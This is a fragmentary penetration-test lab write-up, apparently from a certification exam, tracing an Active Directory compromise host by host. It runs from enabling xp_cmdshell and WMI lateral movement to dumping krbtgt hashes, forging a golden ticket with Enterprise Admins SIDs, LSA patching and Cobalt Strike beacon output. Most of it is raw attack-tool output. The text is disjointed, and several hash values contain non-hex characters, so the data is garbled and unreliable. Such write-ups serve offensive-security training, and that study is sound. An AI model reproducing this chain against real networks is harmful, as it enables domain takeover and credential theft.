E CPTX
3. 10.100.11.150
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies
SQL> enable_xp_cmdshell
[*] INFO(UATSERVER\DB1): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
--------------------------------------------------------------------------------
nt service\mssql$db1
NULL
SQL>
Execute commands

To gain access to the jumpbox over wmic
After gaining shell access I tried to escalate my privileges and managed to do so by reading an unattended install file, which gave me administrator.
5. 10.100.10.253
From the jumpbox (10.100.11.100), using uatoperator, I started to execute commands over WMI.
Object RDN           : krbtgt

** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control :
Account expiration   :
Password last change :
Object Security ID   : S-1-5-21-235po937-599822933-351157107-502
Object Relative ID   : 502
  e4ba51c7157fe411po603b661f1ccfbe
  e4ba51c7111fe46652603b661f1ccfbe
  1389eb4be52e304d1a753a704187dd66

Supplemental Credentials:
* Primary:Kerberos-Newer-Keys *
    aes256_hmac (4096) : d8716ec186380fe09d1cdca13e0342314d1a121b22061db397dc77ddb0b17b9
* Primary:Kerberos *
    Default Salt : ELS-CHILD.ELS.LOCALkrbtgt
    Credentials
    Kerberos-Newer-Keys
* Primary:WDigest *
    01  1cf79ec9db39ca3ui8979d9cca4bdef2
    ..................................
    28  829bb53e575583c3io7f40aabf43f05
    29  0696af48622e71a7oi7cccc94c95d1b
6. 10.100.10.254
To gain access to the parent domain DC, I created a golden ticket using the krbtgt I obtained before for my user, adding him to the Enterprise Admins group.
[+] host called home, sent: 998474 bytes
[+] received output:
User      : admin1
Domain    : els-child.els.local (ELS-CHILD)
SID       : S-1-5-21-23589937-1851e4348-351157107
User Id   : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-2128511948-1851e4348-1523442862-519 ;
ServiceKey: 1cf79ec9db39ca3ui8979d9cca4bdef2 - rc4_hmac_nt
Lifetime  : 10/29/2019 5:08:32 PM ; 10/26/2029 5:08:32 PM ; 10/26/2029 5:08:32 PM
 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated
Final Ticket Saved to file !
Object RDN           : krbtgt

** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
  d8716ec186380fe09d1cdca13e0342314d1a121b22061db397dc77ddb0b17b9
  f4f88438c968756e75252ca4056b0607
  d8716ec186380fe09d1cdca13e0342314d1a121b22061db397dc77ddb0b17b9

Supplemental Credentials:
* Primary:Kerberos-Newer-Keys *
    aes256_hmac (4096) : d8716ec186380fe09d1cdca13e0342314d1a121b22061db397dc77ddb0b17b9
    aes128_hmac (4096) : d8716ec186380fe09d1cdca13e0342314d1a121b22061db397dc77ddb0b17b9
    des_cbc_md5 (4096) : 57fb67328f4651a7
* Primary:Kerberos *
    Default Salt : ELS.LOCALkrbtgt
    Credentials
      des_cbc_md5 : d8716ec186380fe09d1cdca13e0342314d1a121b22061db397dc77ddb0b17b9
* Packages *
    Kerberos-Newer-Keys
* Primary:WDigest *
    01  b4e712be7d587a19fe5b18b07a7ff799
    ...........................
    29  e1ac403d7b274c3d8c2e2c2d40ab7ccc
Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control :
Account expiration   :
Password last change :
Object Security ID   : S-1-5-21-2128511948-1856962338-1523442862-500
Object Relative ID   : 500
  49623ccc820121223b3f0f571b77186

Credentials:
* Primary:Kerberos-Newer-Keys *
    Default Salt : ELS.LOCALAdministrator
    Default Iterations : 4096
    Credentials
  |  PID  2052
  |  TID  2676
  |  LSA Process is now R/W
  |  LUID 0 ; 1632426 (00000000:0018e8aa)
  \_ msv1_0   - data copy @ 0000004BBB9CA130 : OK !
  \_ kerberos - data copy @ 0000004BBB97F318
     \_ rc4_md4          OK
     \_ rc4_hmac_nt_exp  OK
     \_ rc4_hmac_old_exp OK
     \_ *Password replace @ 0000004BBB9745C8 (16) -> null
beacon> ls \\lab-dc01.els.local\c$
[*] Tasked beacon to list files in \\lab-dc01.els.local\c$
[+] host called home, sent: 41 bytes
[*] Listing: \\lab-dc01.els.local\c$\

 dir    03/18/2014 03:33:36    $Recycle.Bin
Windows IP Configuration
Ethernet adapter Ethernet0: